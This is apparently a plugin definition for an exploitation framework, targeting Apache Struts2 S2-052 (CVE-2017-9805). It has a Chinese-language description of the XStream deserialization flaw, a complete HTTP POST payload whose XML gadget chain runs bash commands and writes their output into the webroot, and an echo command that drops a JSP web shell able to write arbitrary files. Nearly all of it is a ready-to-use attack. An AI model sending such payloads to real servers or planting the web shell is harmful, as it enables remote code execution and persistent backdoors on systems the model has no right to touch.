info:
    app: Struts2
    name: S2_052
    author: lz520520
    plugin_version: 1.0.0
    disclosure_date: "2017-09-01"
    create_date: "2024-10-06 12:53:25"
    update_date: "2024-10-06 12:53:25"
    scope: Struts 2.5 - Struts 2.5.12
    description: Apache 官方发布 Struts 2 紧急漏洞公告（S2-052），CVE 编号CVE-2017-9805。公告中披露，Struts2 REST插件的XStream组件存在反序列化漏洞，导致远程代码执行。攻击者利用此漏洞可执行任意代码，创建/删除系统账号，修改任意文件，植入后门等
    vul_id: CVE-2017-9805
    detail: |
        构造恶意xml
        该漏洞不同于之前的RCE，为反序列化漏洞，且无回显。
        所以在利用时，取巧了，输入的命令whoami，会在程序里组装成如/bin/bash -c whoami > ./webapps/ROOT/s2_052.txt 2>&1，并进行html编码
        将执行结果重定向到一个文本，再去请求该文件，这里是放在根目录下。
        URL如http://192.168.111.111:8080/orders.xhtml
        写文件执行以下命令,通过burp抓包修改重定向文件后缀
        echo "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"/\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());%>"
    payload: |-
        POST /orders.xhtml HTTP/1.1
        Host: 192.168.111.111:8080
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Connection: close
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Content-Type: application/xml
        Content-Length: 2444

        <map>
          <entry>
            <jdk.nashorn.internal.objects.NativeString>
              <flags>0</flags>
              <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
                <dataHandler>
                  <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                    <is class="javax.crypto.CipherInputStream">
                      <cipher class="javax.crypto.NullCipher">
                        <initialized>false</initialized>
                        <opmode>0</opmode>
                        <serviceIterator class="javax.imageio.spi.FilterIterator">
                          <iter class="javax.imageio.spi.FilterIterator">
                            <iter class="java.util.Collections$EmptyIterator"/>
                            <next class="java.lang.ProcessBuilder">
                              <command>
                                <string>/bin/bash</string>
                                <string>-c</string>
                                <string>whoami&gt;./webapps/ROOT/s2_052.txt 2&gt;&amp;1</string>
                              </command>
                              <redirectErrorStream>false</redirectErrorStream>
                            </next>
                          </iter>
                          <filter class="javax.imageio.ImageIO$ContainsFilter">
                            <method>
                              <class>java.lang.ProcessBuilder</class>
                              <name>start</name>
                              <parameter-types/>
                            </method>
                            <name>foo</name>
                          </filter>
                          <next class="string">foo</next>
                        </serviceIterator>
                        <lock/>
                      </cipher>
                      <input class="java.lang.ProcessBuilder$NullInputStream"/>
                      <ibuffer></ibuffer>
                      <done>false</done>
                      <ostart>0</ostart>
                      <ofinish>0</ofinish>
                      <closed>false</closed>
                    </is>
                    <consumed>false</consumed>
                  </dataSource>
                  <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
              </value>
            </jdk.nashorn.internal.objects.NativeString>
            <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
          </entry>
          <entry>
            <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
            <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
          </entry>
        </map>
payloads:
    - name: cmd1
      alias: 命令执行
      params:
          - key: cmd
            title: 命令
            param_type: edit
            default_value: whoami
            required: true
